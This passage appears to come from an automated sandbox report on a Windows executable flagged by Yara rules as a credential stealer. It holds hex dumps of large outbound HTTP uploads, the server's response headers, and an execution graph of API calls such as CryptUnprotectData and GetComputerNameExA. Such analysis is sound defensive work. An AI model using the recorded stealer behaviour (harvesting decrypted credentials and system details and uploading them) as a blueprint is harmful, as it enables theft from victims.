                                                                                                                                                                                                                                  Data Ascii: l$n.GHkh=;uHGK?gh2mw~i.C8-^WF,6,m*F,>0p9Zy0^l0,AQc?m-&,NIBa`Xs]:b#F[L=y%Y6:Athb[GzRC D7ao3
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: 2e 4d 08 1a 50 59 27 93 33 ca d7 a3 8d cc da 03 6f a9 0f 4b 5e e5 6a 7a ab d0 d4 70 4b e5 f8 58 46 32 35 e5 ac 13 9f 90 68 cf 87 05 21 b9 b1 60 6c 2c 61 73 b3 16 2f 27 c9 d3 b3 97 34 68 63 67 ab d3 9b 82 7c eb 8e 27 ba 24 53 a1 40 c8 39 ee ae ce ca c5 09 13 cc 9c 22 fb 49 89 8f d7 01 72 6c 28 7d 57 68 43 73 e2 a5 5a fd 9d cd ef af fb d4 59 0d 02 e9 61 dc 2c fa d7 0d e7 87 61 24 54 ff a3 48 3f 3e d7 57 db bb 3b 8e 3f 43 39 c6 0f a4 29 01 99 f8 d4 92 53 77 64 b8 29 4f 46 e8 35 23 d5 ed 97 c2 06 8a 87 5e bd 19 9e f1 7e fb 53 8c f5 d2 99 fb 24 94 36 a1 f2 26 68 7a e5 21 c4 fc 14 c8 f9 72 49 7b dc 20 90 53 9e 38 78 28 3f 43 98 31 62 d5 51 d5 15 be b8 d7 2a b6 78 d5 7a e6 b6 d5 dd 6a ce 78 55 50 bd 50 df b1 f6 0a de d6 93 06 22 23 65 93 b5 ca 83 35 9d 97 fe 88
                                                                                                                                                                                                                                  Data Ascii: .MPY'3oK^jzpKXF25h!`l,as/'4hcg|'$S@9"Irl(}WhCsZYa,a$TH?>W;?C9)Swd)OF5#^~S$6&hz!rI{ S8x(?C1bQ*xzjxUPP"#e5
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: d1 20 2e ca ae 27 0d 9e d5 6a fe d0 65 71 7b 7d 33 1c 25 fe 11 69 90 3c a9 55 24 4e 05 e2 2c 7b 71 b1 e7 e4 8b ba b8 93 c4 da e6 aa ca 02 6b b6 41 c4 42 c9 6f 97 3d 72 e7 15 04 07 b5 b7 02 7f b7 9d 81 ce b8 1e f5 1c 07 9d b7 c7 14 ae c0 3f ab 5d a6 22 58 4a 8e a5 1d a7 93 27 0d 1f dc 04 1e 32 f2 4f 5b 75 57 1a 7e 74 7f 9d 19 a8 6c b2 47 4f b3 7d 43 37 99 25 1d 92 33 53 66 c7 7e d0 f7 b0 74 a8 9a 1b 9b 89 46 15 ea e3 59 51 ae ab 25 85 1b d1 eb 39 5a 93 d2 97 6b 7e 91 d3 ee b4 ae a6 4f b0 77 cc dd ae 9a e6 fd b7 b7 ed ed 90 98 90 db f1 88 b3 f2 4b 75 c8 65 ec 4d 56 9b 5b d3 e0 15 c1 ca 1b aa 14 b6 bf f8 6a cb 40 88 eb 8a de 15 87 45 ba 2e ad 72 44 1e 09 3e 9a 6c 15 77 55 3d 98 5f 48 67 f5 35 45 d4 b9 cc 99 2b 9e 2b 6d 95 be 7e ba ee e6 dc d1 95 5a 5d 23 89
                                                                                                                                                                                                                                  Data Ascii: .'jeq{}3%i<U$N,{qkABo=r?]"XJ'2O[uW~tlGO}C7%3Sf~tFYQ%9Zk~OwKueMV[j@E.rD>lwU=_Hg5E++m~Z]#
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: 27 84 40 f9 2b 5c f3 b8 d9 30 be 3f a2 08 17 09 12 04 88 1e 50 17 67 53 0f c0 c9 84 72 83 49 d4 95 49 8c 73 b5 b6 1a 2e 28 96 8d f8 9b 89 8d 9c d3 2f 07 65 79 42 4e 51 b0 22 c8 16 22 c9 2c fe b1 09 55 59 c9 3f 68 8f 0e cb b4 21 5f c2 0a bf 54 ca 7e 68 60 1c 51 66 92 2d 89 08 e5 3c 27 41 ed 30 67 05 6c 14 9e 75 d4 59 ce 53 dd ad a2 5a ad d2 de f8 a0 fb ee 38 74 89 98 3d bd ce 65 a6 67 28 74 99 77 3d 47 26 9f 0f 7b c8 30 c7 6d 93 a1 55 2a e5 4a df 35 f0 fa a3 b9 0b b8 1c 3f ef 3a 89 f9 f6 02 96 56 c8 dd 5e 69 3a c8 e0 c0 a9 5b e3 4e 15 5c 48 f0 e9 d6 eb 46 1e 30 38 e4 38 6c 7d d0 05 23 bc f9 7e ca 7f e7 0d 4d d3 00 75 69 c7 3b 78 e9 8a 10 72 67 a5 6a 58 d8 5f 31 e5 47 d4 0c 33 af e1 09 24 e5 fd 01 e8 3d f8 ff df b1 bd da 39 ca df 8a f3 2f 9c dc 53 1c 71 a7
                                                                                                                                                                                                                                  Data Ascii: '@+\0?PgSrIIs.(/eyBNQ"",UY?h!_T~h`Qf-<'A0gluYSZ8t=eg(tw=G&{0mU*J5?:V^i:[N\HF088l}#~Mui;xrgjX_1G3$=9/Sq
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: 63 f5 ef df 2c 6e e0 27 0d 0b ec bc d7 9e a9 a6 47 2e 13 87 72 ee 2f df c3 01 2b 66 5b b5 50 c5 01 a7 cf a6 e1 ad ea 25 5a 02 df ee d2 4c e6 d3 4a 3d b4 88 81 8b 58 91 14 af 19 69 9a 9d 85 92 22 ec 07 8d 9f 92 88 2d fc 37 4d ab de 59 34 ae c6 59 78 44 86 30 6e 80 17 47 a8 4f b5 68 e0 d5 bd ee d3 53 f2 47 56 9b 1e ef ce 68 31 6f 8c 57 d1 82 fe f3 25 9e 0c 53 21 50 81 70 84 7b dd fd ac 37 d6 55 52 ce 65 30 a9 44 bb 03 f5 a5 59 27 bf de 4f 78 dc f8 74 ad 9c b2 e8 d7 45 07 a6 77 56 02 7c 95 a3 3f 27 b6 eb 9c 5f cf 66 8a c4 d2 79 4c 86 28 35 ec 2f 2f 66 85 69 9b 74 02 ac d9 24 a3 0b de cf 0f f3 35 28 ab 44 12 89 9e 2b c6 99 04 f0 67 24 20 1c a0 bb dc 55 5b 75 a1 2b a2 99 8b 7d ae 70 a4 f2 11 a4 5b e6 70 2c cb 95 01 7b 37 60 ee 17 98 81 58 06 8f 54 75 dc 8d 9e
                                                                                                                                                                                                                                  Data Ascii: c,n'G.r/+f[P%ZLJ=Xi"-7MY4YxD0nGOhSGVh1oW%S!Pp{7URe0DY'OxtEwV|?'_fyL(5//fit$5(D+g$ U[u+}p[p,{7`XTu
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: d0 2c 4c 53 bd 1a bb 1c b1 e0 d1 ef 52 f9 c6 f9 2a da 91 88 da 80 60 45 2a f3 98 00 ec 8c f9 3e 1b f2 14 45 ad 67 58 00 e6 15 d6 d1 c3 c8 5a fc 1b f4 70 10 9f 5b 20 0e 2a 91 94 ef cf bc c1 1b 6e ee d6 d2 40 ca 82 7a 17 ae 0a ba 67 9e 95 89 c5 a8 49 1c 8c b5 11 06 6b 99 a0 a1 ab 02 bf 14 d2 8e 9a 19 88 41 f1 5c 35 74 cf f6 c5 9e 48 a0 e7 25 97 18 f3 35 85 bf dc 00 49 f9 cc 84 d0 08 b2 ee 7e 42 db 56 6f d6 65 a0 ad 73 35 c0 b5 79 ef e8 f1 85 2f 33 94 e9 c9 cf 1a 2b ea 0f 67 93 16 8d 29 e9 c3 68 8e 6f a6 e2 7c ce 43 50 df f7 4b 4b 5a d9 9b db fb 96 2e 05 2e a8 19 4a a8 9c 44 8a 71 cf 8f 7e 50 ae 07 48 ec 4b 5d f7 d3 c2 f1 32 97 05 5e 83 c6 ba 7a 19 76 1d d6 87 40 65 a7 84 b3 33 65 f4 f7 6d 2f d2 43 45 1f e4 dc 5e d9 49 0b e1 ef 6e 2e fb 5a 5b b5 4b a6 63 c5
                                                                                                                                                                                                                                  Data Ascii: ,LSR*`E*>EgXZp[ *n@zgIkA\5tH%5I~BVoes5y/3+g)ho|CPKKZ..JDq~PHK]2^zv@e3em/CE^In.Z[Kc
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: be 74 08 d6 b8 02 dc 86 d5 d3 f7 3c bf c6 e3 c9 38 ac 75 21 85 fb a2 74 78 06 44 e5 6c 9e 0b 10 a4 03 d1 bc 1e 18 f5 bd fd 39 40 33 e7 ec 26 67 ca c7 65 27 49 d1 2b c0 fa 01 03 07 e2 db c4 e8 dd 7c e0 c8 7f 9a db 17 4f cb cd db 85 cd 8f d6 c5 83 d9 16 03 25 23 92 e2 7a 91 97 c1 e3 f0 12 8e 4e cd 3e 48 b4 88 dd dd 71 d5 42 12 5a 39 85 93 54 a9 b0 b5 74 b8 cd 56 5d 10 6c c3 75 f1 0e cf ce ae 36 8f 6a 8b d0 bf 88 87 10 3a e6 08 97 c0 94 86 c2 85 b1 7b 4f f8 73 2c ce 3b d7 a5 09 98 66 3f d7 46 79 9b 77 13 9d f6 1a 57 06 49 40 8d 15 ad 48 de c4 fa d0 05 de 51 7d 3f cc 1b 17 ae dc 55 15 34 63 4d bb 75 f7 67 6a 91 37 fb d1 b5 5a b4 d8 65 cc de c1 48 1a e6 d8 c4 37 ad f0 ff b5 2e 5a e9 fc 95 ed fe 56 9c 7a 37 09 4f 4a db 87 9f 50 5d 6a bd 18 a7 4a 97 35 3b 85 85
                                                                                                                                                                                                                                  Data Ascii: t<8u!txDl9@3&ge'I+|O%#zN>HqBZ9TtV]lu6j:{Os,;f?FywWI@HQ}?U4cMugj7ZeH7.ZVz7OJP]jJ5;
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: 3b 45 04 86 8f ef a3 88 d6 27 78 2f 95 37 86 18 8a 3c cb 1c 2c e7 52 c0 62 c5 f6 d7 52 36 df 71 77 af f3 74 97 19 91 90 5c 7b 9c 0d c1 01 64 2c 0e 30 e9 e1 e8 b7 1a 8e f7 7d 25 9c 54 00 b1 6e 0c 2b 5d ab f1 24 12 21 7a a0 1c f9 10 c8 59 1e be 8c 12 6b e7 ef 70 54 80 49 fc 4c c0 22 fa b1 14 41 a7 a9 0a 49 26 91 b2 7b 55 83 9c 8b 8a 5a 4a fa 00 92 bd 48 b1 de e4 33 f0 25 2f 03 49 be 32 06 96 81 05 e2 e8 c4 59 61 3e 9a 25 67 79 01 57 72 19 71 08 59 14 38 15 7a 01 05 5b 37 85 d6 1b e0 96 6e d3 db 19 3f 41 7b 83 d6 99 70 ee 5d 4a 92 92 a1 a1 00 24 7b c2 82 66 58 a0 b8 77 88 70 65 11 47 28 8c dd 12 64 0a 70 21 56 8e c9 a4 29 21 20 6c 89 da 2e 96 65 cd 85 c0 10 49 b2 03 54 0a 24 28 32 3a 70 06 e6 86 e6 75 49 da ec 92 f5 94 f6 36 6d cc d8 76 8a 4f dd b2 eb 69 60
                                                                                                                                                                                                                                  Data Ascii: ;E'x/7<,RbR6qwt\{d,0}%Tn+]$!zYkpTIL"AI&{UZJH3%/I2Ya>%gyWrqY8z[7n?A{p]J${fXwpeG(dp!V)! l.eIT$(2:puI6mvOi`
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: d3 bf e0 7b b2 e0 d0 81 a9 94 40 0f f2 59 13 5b d9 89 8a 80 db 0d d3 50 9d 47 69 4b 22 25 8c c6 ce 5f 0d 88 d9 8f f3 80 6e 17 83 a2 d7 ac e3 56 c6 fe 6d 37 ef bd ad 22 c4 21 5f ec 7b b9 3c fe f4 bf ad 4a e7 51 61 32 79 8f c2 f2 6c e0 10 06 9b df 6d bd ff 8c f4 c5 95 20 d7 df 1f 5f 45 1b 14 2c 26 a4 96 0c d1 7c 32 1d 4e c5 8f 86 ae 3c 59 ef bb 43 d3 67 a6 ce e7 47 3e 4c 0b 60 f9 f2 c7 7a 43 f8 09 de f8 c6 9b 33 78 a5 ef a6 c4 14 7a 93 f4 0d 96 f4 01 bb a0 19 89 00 87 95 37 15 be 4a bc 51 ec 42 d3 6a 52 74 a6 75 c6 e1 02 c0 fe 9b 7d 53 87 35 d9 51 ec e7 cc 7d 13 e4 fd 57 6b 08 c1 0d a4 42 23 80 94 80 f0 0a 3e e4 ca ac 0b 02 c9 25 00 fa d7 fe f1 de 60 65 51 d6 3e e4 de 37 58 84 4d 3a f9 f7 5f 5f a3 f1 13 56 14 72 24 f2 36 83 4e fb 1a bf 60 31 ca a7 0d 04 f0
                                                                                                                                                                                                                                  Data Ascii: {@Y[PGiK"%_nVm7"!_{<JQa2ylm _E,&|2N<YCgG>L`zC3xz7JQBjRtu}S5Q}WkB#>%`eQ>7XM:__Vr$6N`1
                                                                                                                                                                                                                                  2024-12-26 12:09:49 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:49 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=987ivm9cmh5qm9ldcrucrvusch; expires=Mon, 21 Apr 2025 05:56:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gdogTtgVEw3BOCbK1yvdKhUoKerX6oUHSYlD7OzIqVi94bmxfol%2Bx0HD2KxpviIwOFVU3w%2FQEblmDGOM52CTWnY%2FO1VZGJBbFKcqQQ2tCnrwulmmxeH5KyRnj0p1mnddZGs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f6c0db85c335-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1699&rtt_var=645&sent=346&recv=600&lost=0&retrans=0&sent_bytes=2834&recv_bytes=575275&delivery_rate=1685912&cwnd=165&unsent_bytes=0&cid=9516870d3d37e9a9&ts=3718&x=0"


                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:07:09:20
                                                                                                                                                                                                                                  Start date:26/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\YKri2nEBWE.exe"
                                                                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                                                                  File size:2'920'448 bytes
                                                                                                                                                                                                                                  MD5 hash:1C4C5CCA8B9C930895E0E425563CF07E
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:27.7%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:68.2%
                                                                                                                                                                                                                                    Total number of Nodes:255
                                                                                                                                                                                                                                    Total number of Limit Nodes:23
                                                                                                                                                                                                                                    execution_graph 3036 c4ce45 3037 c4ce4b 3036->3037 3038 c4ce55 CoUninitialize 3037->3038 3039 c4ce80 3038->3039 3123 c4e687 3124 c4e6a0 3123->3124 3129 c79280 3124->3129 3126 c4e77a 3127 c79280 5 API calls 3126->3127 3128 c4e908 3127->3128 3130 c792b0 3129->3130 3132 c7954f SysAllocString 3130->3132 3135 c798eb 3130->3135 3131 c79916 GetVolumeInformationW 3136 c79934 3131->3136 3133 c79574 3132->3133 3134 c7957c CoSetProxyBlanket 3133->3134 3133->3135 3134->3135 3138 c7959c 3134->3138 3135->3131 3136->3126 3137 c798d6 SysFreeString SysFreeString 3137->3135 3138->3137 3139 c48600 3142 c4860f 3139->3142 3140 c48a48 ExitProcess 3142->3140 3143 c7e080 3142->3143 3144 c7f970 3143->3144 3145 c7e085 FreeLibrary 3144->3145 3145->3140 3146 c61d00 3159 c81320 3146->3159 3148 c61d43 3151 c623f5 3148->3151 3158 c61de9 3148->3158 3163 c7e110 LdrInitializeThunk 3148->3163 3150 c7c570 RtlFreeHeap 3152 c6239e 3150->3152 3152->3151 3165 c7e110 LdrInitializeThunk 3152->3165 3153 c62383 3153->3150 3155 c6245a 3153->3155 3157 c7c570 RtlFreeHeap 3157->3158 3158->3153 3158->3157 3164 c7e110 LdrInitializeThunk 3158->3164 3161 c81340 3159->3161 3160 c8145e 3160->3148 3161->3160 3166 c7e110 LdrInitializeThunk 3161->3166 3163->3148 3164->3158 3165->3152 3166->3160 3167 c4f60d 3168 c4f627 3167->3168 3169 c4fdc2 RtlExpandEnvironmentStrings 3168->3169 3170 c4f444 3168->3170 3169->3170 3171 c7e40d 3173 c7e484 3171->3173 3172 c7ed6e 3173->3172 3175 c7e110 LdrInitializeThunk 3173->3175 3175->3172 3305 c681cc 3306 c681d1 3305->3306 3306->3306 3307 c68486 RtlExpandEnvironmentStrings 3306->3307 3308 c684d0 3306->3308 3311 c681e4 3306->3311 3307->3308 3309 c685a0 RtlExpandEnvironmentStrings 3308->3309 3310 c685e3 3308->3310 3308->3311 3313 c68611 3308->3313 3309->3310 3309->3311 3309->3313 3312 c81320 LdrInitializeThunk 3310->3312 3312->3313 3313->3311 3314 c81720 LdrInitializeThunk 3313->3314 3315 c688a1 3313->3315 3314->3315 3315->3311 3317 c7e110 LdrInitializeThunk 3315->3317 3317->3311 3048 c6d34a 3049 c6d370 3048->3049 3049->3049 3050 c6d3ea GetPhysicallyInstalledSystemMemory 3049->3050 3051 c6d410 3050->3051 3051->3051 3318 c6a0ca 3319 c6a166 3318->3319 3320 c6a090 3318->3320 3320->3318 3320->3319 3321 c6a3ac 3320->3321 3322 c6a3f3 3320->3322 3323 c81720 LdrInitializeThunk 3320->3323 3324 c6a43e 3320->3324 3326 c81320 LdrInitializeThunk 3321->3326 3327 c81320 LdrInitializeThunk 3322->3327 3323->3320 3329 c7e110 LdrInitializeThunk 3324->3329 3326->3322 3327->3324 3328 c6a4e3 3329->3328 3176 c7eb88 3178 c7eba0 3176->3178 3177 c7ebde 3177->3177 3180 c7ec4e 3177->3180 3182 c7e110 LdrInitializeThunk 3177->3182 3178->3177 3183 c7e110 LdrInitializeThunk 3178->3183 3182->3180 3183->3177 3184 c61a10 3185 c61a20 3184->3185 3185->3185 3188 c814b0 3185->3188 3187 c61b0f 3190 c814d0 3188->3190 3189 c815fe 3189->3187 3190->3189 3192 c7e110 LdrInitializeThunk 3190->3192 3192->3189 3052 c4ef53 3053 c4ef5d CoInitializeEx 3052->3053 3193 c7679f 3196 c767bc 3193->3196 3194 c7682d 3196->3194 3197 c7e110 LdrInitializeThunk 3196->3197 3197->3196 3198 c49d1e 3199 c49d40 3198->3199 3199->3199 3200 c49d94 LoadLibraryExW 3199->3200 3201 c49da5 3200->3201 3202 c49e74 LoadLibraryExW 3201->3202 3203 c49e85 3202->3203 3054 c7c55c RtlAllocateHeap 3055 c7e967 3056 c7e980 3055->3056 3056->3056 3059 c7e110 LdrInitializeThunk 3056->3059 3058 c7e9ef 3059->3058 3204 c51227 3205 c51241 3204->3205 3206 c514e5 RtlExpandEnvironmentStrings 3205->3206 3209 c4f444 3205->3209 3208 c51562 3206->3208 3208->3209 3210 c557c0 3208->3210 3211 c557e0 3210->3211 3211->3211 3212 c81320 LdrInitializeThunk 3211->3212 3213 c558ed 3212->3213 3215 c55ae8 3213->3215 3218 c55b92 3213->3218 3225 c5594e 3213->3225 3231 c55cad 3213->3231 3235 c81720 3213->3235 3215->3225 3242 c7e110 LdrInitializeThunk 3215->3242 3219 c81320 LdrInitializeThunk 3218->3219 3219->3231 3220 c81720 LdrInitializeThunk 3220->3231 3223 c560f1 3229 c566be 3223->3229 3233 c5634d 3223->3233 3224 c560b5 CryptUnprotectData 3224->3223 3224->3225 3224->3231 3225->3209 3227 c5731b 3232 c56792 3229->3232 3243 c7e110 LdrInitializeThunk 3229->3243 3230 c568eb 3245 c7e110 LdrInitializeThunk 3230->3245 3231->3220 3231->3223 3231->3224 3231->3225 3241 c7e110 LdrInitializeThunk 3231->3241 3232->3230 3244 c7e110 LdrInitializeThunk 3232->3244 3233->3225 3234 c814b0 LdrInitializeThunk 3233->3234 3234->3233 3236 c81750 3235->3236 3239 c817a9 3236->3239 3246 c7e110 LdrInitializeThunk 3236->3246 3237 c5593f 3237->3215 3237->3218 3237->3225 3237->3231 3239->3237 3247 c7e110 LdrInitializeThunk 3239->3247 3241->3231 3242->3229 3243->3232 3244->3230 3245->3227 3246->3239 3247->3237 3248 c78ea0 3251 c78ec5 3248->3251 3250 c79210 3252 c78fc9 3251->3252 3257 c7e110 LdrInitializeThunk 3251->3257 3252->3250 3254 c790e1 3252->3254 3256 c7e110 LdrInitializeThunk 3252->3256 3254->3250 3258 c7e110 LdrInitializeThunk 3254->3258 3256->3252 3257->3251 3258->3254 3259 c7c5a0 3260 c7c5d0 3259->3260 3263 c7c62e 3260->3263 3267 c7e110 LdrInitializeThunk 3260->3267 3261 c7c801 3263->3261 3266 c7c749 3263->3266 3268 c7e110 LdrInitializeThunk 3263->3268 3264 c7c570 RtlFreeHeap 3264->3261 3266->3264 3267->3263 3268->3266 3065 c6d7ee 3066 c6d7f5 FreeLibrary 3065->3066 3069 c6dbc9 3066->3069 3068 c6dc30 GetComputerNameExA 3069->3068 3069->3069 3070 c80460 3071 c80480 3070->3071 3071->3071 3074 c804ce 3071->3074 3078 c7e110 LdrInitializeThunk 3071->3078 3072 c806dd 3074->3072 3077 c805af 3074->3077 3079 c7e110 LdrInitializeThunk 3074->3079 3077->3077 3080 c7c570 3077->3080 3078->3074 3079->3077 3081 c7c585 3080->3081 3082 c7c583 3080->3082 3083 c7c58a RtlFreeHeap 3081->3083 3082->3072 3083->3072 3269 c80d20 3270 c80d2f 3269->3270 3274 c80e98 3270->3274 3277 c7e110 LdrInitializeThunk 3270->3277 3271 c8114b 3273 c7c570 RtlFreeHeap 3273->3271 3274->3271 3276 c8108e 3274->3276 3278 c7e110 LdrInitializeThunk 3274->3278 3276->3273 3277->3274 3278->3276 3279 c70b2b CoSetProxyBlanket 3330 c560e9 3331 c560ee 3330->3331 3333 c566be 3331->3333 3339 c5634d 3331->3339 3332 c565bd 3332->3332 3341 c56792 3333->3341 3342 c7e110 LdrInitializeThunk 3333->3342 3336 c5731b 3338 c568eb 3344 c7e110 LdrInitializeThunk 3338->3344 3339->3332 3340 c814b0 LdrInitializeThunk 3339->3340 3340->3339 3341->3338 3343 c7e110 LdrInitializeThunk 3341->3343 3342->3341 3343->3338 3344->3336 3085 c4a369 3086 c4a430 3085->3086 3086->3086 3089 c4b100 3086->3089 3088 c4a479 3090 c4b190 3089->3090 3090->3090 3092 c4b1b5 3090->3092 3093 c7e0a0 3090->3093 3092->3088 3094 c7e0c0 3093->3094 3095 c7e0d4 3093->3095 3096 c7e0f3 3093->3096 3098 c7e0e8 3093->3098 3094->3095 3094->3096 3099 c7e0d9 RtlReAllocateHeap 3095->3099 3097 c7c570 RtlFreeHeap 3096->3097 3097->3098 3098->3090 3099->3098 3280 c7ea29 3281 c7ea50 3280->3281 3282 c7ea8e 3281->3282 3287 c7e110 LdrInitializeThunk 3281->3287 3286 c7e110 LdrInitializeThunk 3282->3286 3285 c7eb59 3286->3285 3287->3282 3345 c6a068 3346 c81720 LdrInitializeThunk 3345->3346 3356 c6a079 3346->3356 3347 c6a0a0 3348 c6a3ac 3353 c81320 LdrInitializeThunk 3348->3353 3349 c6a3f3 3354 c81320 LdrInitializeThunk 3349->3354 3350 c81720 LdrInitializeThunk 3350->3356 3351 c6a43e 3357 c7e110 LdrInitializeThunk 3351->3357 3353->3349 3354->3351 3355 c6a4e3 3356->3347 3356->3348 3356->3349 3356->3350 3356->3351 3356->3356 3357->3355 3288 c995b8 3289 c999ca VirtualAlloc 3288->3289 3291 c99c46 3289->3291 3100 c4ec77 3101 c4ec8e CoInitializeSecurity 3100->3101 3292 c49eb7 3293 c7fe00 3292->3293 3294 c49ec7 WSAStartup 3293->3294 3102 c4de73 3103 c4ded0 3102->3103 3105 c4df1e 3103->3105 3106 c7e110 LdrInitializeThunk 3103->3106 3106->3105 3295 c6c8b1 3296 c6c8b0 3295->3296 3296->3295 3299 c6c8be 3296->3299 3301 c7e110 LdrInitializeThunk 3296->3301 3300 c7e110 LdrInitializeThunk 3299->3300 3300->3299 3301->3299 3302 c6d7bd 3304 c6d7ca GetComputerNameExA 3302->3304 3107 c4cc7a 3108 c4cc86 3107->3108 3113 c67440 3108->3113 3110 c4cce6 3111 c67440 2 API calls 3110->3111 3112 c4cdac 3111->3112 3114 c67460 3113->3114 3117 c674ae 3114->3117 3121 c7e110 LdrInitializeThunk 3114->3121 3115 c67726 3115->3110 3117->3115 3120 c6756e 3117->3120 3122 c7e110 LdrInitializeThunk 3117->3122 3118 c7c570 RtlFreeHeap 3118->3115 3120->3118 3121->3117 3122->3120

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00C557C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
